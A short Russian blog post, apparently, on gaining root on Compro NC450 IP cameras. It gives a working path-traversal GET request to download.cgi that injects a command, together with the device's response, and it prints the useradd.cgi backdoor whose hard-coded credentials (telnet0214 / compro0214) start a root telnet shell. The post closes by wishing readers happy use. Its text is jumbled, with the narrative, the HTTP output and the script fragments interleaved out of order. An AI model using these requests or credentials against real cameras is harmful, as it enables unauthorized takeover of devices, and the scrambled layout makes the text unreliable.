Получение root на IP камере Compro NC450
Судя по всему, создатели камеры не сильно озаботились безопасностью устройства и оставили CGI уязвимость для нас (или для себя):
Выполнив следующий HTTP GET запрос:
"http://<camera IP>/cgi-bin/recording/download.cgi?ch=0&attach=../../../../bin/echo%20/etc/motd"в ответе мы получим Message of the day:
Content-Disposition: attachment; filename="../../../../bin/echo "your hax0red h0 h0" >> /etc/motd"Путем несложных исследований файловой системы устройства было обнаружено, что скрипт добавления нового пользователя камеры useradd.cgi содержит бэкдор, запускающий Telnet сервер:
Content-Transfer-Encoding: binary
cat: /web/html/cgi-bin/recording/save0/record0/../../../../bin/echo: No such file or directory
cat: "your: No such file or directory
cat: hax0red: No such file or directory
cat: h0: No such file or directory
cat: h0": No such file or directory
cat: >>: No such file or directory
Welcome to
_____ __ ___ __ ___ _ _ _
| ___| / \ / __ \ / \ | _ \ / \ \ \ / /
| |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V /
| ___|| |__| | | _ / | |__| | | | | | | |__| | \ /
| | | __ | | | \ \ | __ | | |_/ / | __ | | |
|_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_|
For further information check:
http://www.GM.com/
if [ $USERNAME = "telnet0214" ]; thenТ.е. чтобы запустить Telnet, достаточно зайти на страничку управления пользователями в WEB интерфейсе камеры и добавить пользователя с логином telnet0214 и паролем compro0214.
if [ $PASSWD2 = "compro0214" ]; then
/bin/busybox telnetd -l /bin/sh
echo "<script type=\"text/javascript\">"
echo " alert('Telnet started!');"
echo " window.close();"
echo "</script>"
bCreate="no"
fi
fi
Удачного использования :)
Комментарии
Отправить комментарий